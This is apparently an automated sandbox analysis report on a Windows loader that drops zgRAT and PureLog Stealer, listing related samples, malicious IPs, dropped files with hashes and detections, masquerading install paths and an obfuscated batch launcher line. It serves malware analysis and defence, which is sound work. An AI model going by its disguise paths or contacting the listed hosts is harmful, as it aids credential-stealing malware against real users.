                                                              • 37.44.238.94
                                                              dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 37.44.238.94
                                                              dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                              • 37.44.238.94
                                                              8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\Desktop\BLdnhdFQ.loghz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                3XtEci4Mmo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                      Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            aW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (721), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):721
                                                                                  Entropy (8bit):5.899221453660396
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Rezhb37ou/6fmTteOoAdsTGSUuMOOM/RwwDKkMOl8ODSp5CGR6rDDq3nLq+vEV3t:RetDMHG0A6TUuF/RwwDrMOy0Sp5CGR6d
                                                                                  MD5:EE6F2A747EF4D7C1FC1B68B0BA6FFC2E
                                                                                  SHA1:2BAE065E2D6D554591E2F1B5A1CC91D6FEF5437F
                                                                                  SHA-256:7B93350BE80D2A2DBF9E6D326DC5F7320FCC1A297E61B7C15B4C17C1B4BD527F
                                                                                  SHA-512:CCDC7F9B001B8C4F7DA19D60D93904A99E51193E073474B966DAD6B17AC1E2B56D12E1738A2820B98979340D6163EF4738A32728CD6B7DCB9F121BF145B01697
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):1168
                                                                                  Entropy (8bit):4.448520842480604
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                  MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4608
                                                                                  Entropy (8bit):3.902174974132922
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6XmJtjuxZ8RxeOAkFJOcV4MKe28dTd4iE7ckvqBHzuulB+hnqXSfbNtm:P9xvxVx9zJE7ckvklTkZzNt
                                                                                  MD5:3E25AB82C7652239BB3F860C3C95ECA7
                                                                                  SHA1:10D48CC2208E0E69038416D13CFD5310AAC115C0
                                                                                  SHA-256:4E979BA1BD562AB35B1911920384F7126ABBF449B63E76E6B9B00972BAF54331
                                                                                  SHA-512:A80FB6B067E63FB2A00324253DEAACE98A320DA239140ADADC02C4222309EF757E20BB185FA498924D46824A88FFF6700E2405532BD643B879769E8A3BCF505D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\csrss.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\csrss.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (587), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):587
                                                                                  Entropy (8bit):5.902606128090888
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:WbPpXiUnbtQ1pZfBCgnQ4pmsOA1VVrDZ+T0NUKRL8n:Wtiwbt5gfROsrTGsYn
                                                                                  MD5:2EFC49C41A33029AEF882DD57643055D
                                                                                  SHA1:2C47875F73CAB204939F5F0682BC565A61972B0A
                                                                                  SHA-256:17A1F52215158BBB41B00446B54E471C6D53D361AB7CA7A2F2954248F101CA86
                                                                                  SHA-512:14BC02C949A4C6F8E43B35471E3F65A4E8F02848BFE037D82F0D7C5D36EB9C9B9B45B56D6ADCFCBFC8F736E6ABD0C32539ECF848DB23F22C6D33251F354137B8
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):223
                                                                                  Entropy (8bit):5.794994326983631
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:GXkgwqK+NkLzWbHa/JUrFnBaORbM5nCSkXs0/zURJNG:GXkBMCzWLauhBaORbQCSMHzsG
                                                                                  MD5:3569AEC6289503482C7877AD3F205301
                                                                                  SHA1:CF016699D614C9F2E9A899C646CD24ACA6B75FCF
                                                                                  SHA-256:A2BB38C2D2EAFAC2D73AF9247252DE8CFAC9A4F9522B4F66AD73D9A003FC7754
                                                                                  SHA-512:D8DF28CD229E31EB97A705D02AAC38F836B5B05741BDB7C97F4A8D9D3EEC183A3883E39B30C2141E9C8B650C98EDFB51A8CB7FCE1C87D67B15BD9DC52A1B1EF5
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (604), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):604
                                                                                  Entropy (8bit):5.883595344241889
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:K2liyH7f3O3xdSZD+Hx1F3FRs+KgJTdcbs84quEOWwEoqbAD5n+IPiXQd:K2AyaqZCx1Fzs+KgJTdcQN4OL1BVnzPz
                                                                                  MD5:F0C1C60CDA6EE57CD2D925B79E6F5FDF
                                                                                  SHA1:61DB5B108995BB7F9C6C0F53B61BBBBA8799C1D9
                                                                                  SHA-256:CCE9855A619CA87BAE8ECA9F0CDCB8434C575D5A506DAD3908171E4976BBB4A7
                                                                                  SHA-512:718601B6A0F7FFF44047E2652F0B6DED466C69604454A4DEA31C589F41472586FC80FC81519655096516E549E4999BB91A529D289907E21E906528C3B8F4330F
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):96
                                                                                  Entropy (8bit):5.02491439246222
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:nxcIqTZdv+GVXGMW4vflGluLVA4n:xc9ZdjcovtCuO4n
                                                                                  MD5:CA78C31C7FAD40CA729CE40659DD91FA
                                                                                  SHA1:B649A3669CFFE53122AD50F62F769FAA45B96A92
                                                                                  SHA-256:88B4BE83A053855858771FDA50D7F6FE0CD5F5FD0CD33B3299C28AAB5EB40E2B
                                                                                  SHA-512:B606A335AC5F28030E60A00F99E519240BC3D47D7D88E84EB8DE1F34EF19AE6DF56F01F5F6D83FA215F445732596F0865D630675706626545B15E0C64B0A21EC
                                                                                  Malicious:false
                                                                                  Preview:%gLxEGOSyvTwXOE%%qhQsntRDmWDxGo%..%PESm%"C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"%oTQ%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1396
                                                                                  Entropy (8bit):5.350961817021757
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                  Process:C:\Recovery\conhost.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                  Process:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                  Process:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
